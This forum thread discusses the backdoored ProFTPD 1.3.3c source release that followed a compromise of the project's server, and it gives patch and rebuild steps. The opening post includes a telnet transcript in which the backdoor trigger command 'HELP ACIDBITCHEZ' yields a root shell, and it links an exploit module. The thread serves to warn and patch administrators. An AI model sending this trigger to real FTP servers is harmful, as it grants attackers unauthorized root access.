ProFTPD Server Compromised (28 nov/1 Dec) remote trojan exploit.

J

-j0

Verified User
Joined
Nov 23, 2010
Messages
23
Hello,

Code: 
    $ telnet 0 21
    Trying 0.0.0.0…
    Connected to 0.
    Escape character is ‘^]’.
    220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [127.0.0.1]
    HELP
    214-The following commands are recognized (* =>’s unimplemented):
    CWD     XCWD    CDUP    XCUP    SMNT*   QUIT    PORT    PASV
    EPRT    EPSV    ALLO*   RNFR    RNTO    DELE    MDTM    RMD
    XRMD    MKD     XMKD    PWD     XPWD    SIZE    SYST    HELP
    NOOP    FEAT    OPTS    AUTH*   CCC*    CONF*   ENC*    MIC*
    PBSZ*   PROT*   TYPE    STRU    MODE    RETR    STOR    STOU
    APPE    REST    ABOR    USER    PASS    ACCT*   REIN*   LIST
    NLST    STAT    SITE    MLSD    MLST
    214 Direct comments to someone@somewhere
    HELP ANOOP
    502 Unknown command ‘ANOOP’
    HELP a
    502 Unknown command ‘A’
    HELP ACIDBITCHEZ
    id ;
    uid=0(root) gid=0(root) groups=0(root),65534(nogroup)

Code: 
http://packetstormsecurity.org/files/view/96316/proftpd_133c_backdoor.rb.txt

I believe to patch this exploit to run the following command:

Code: 
cd /usr/local/directadmin/custombuild
./build update
./build clean
./build proftpd d

before that please check the version.txt

http://www.proftpd.org/md5_pgp.html
4f2c554d6273b8145095837913ba9e5d proftpd-1.3.3c.tar.gz
Click to expand...

Regards.
 
I don't understand this, forgive me, but is this flaw in the actual 1.3.3c, or the hacked modified 1.3.3c. if not the latter, have they patch it? I'm finding it hard to understand how their server was hacked in the first place.
 
@Peter: It's in the actual 1.3.3c if you downloaded the source between november 28th and december 2. Their server got compromised.

The custombuild version normally is from the beginning of november so when you did a custombuild upgrade, it should be ok.

I'm finding it hard to understand how their server was hacked in the first place.
Click to expand...
Well.... I'm finding it hard to understand that there are still people around who believe that unhackable servers exist.:D
Anyway, they got in through an XSS injection via an unsafe part of the opensource panel they used and a directory which wasn't protected against executables.
 
You must log in or register to reply here.
Back
Top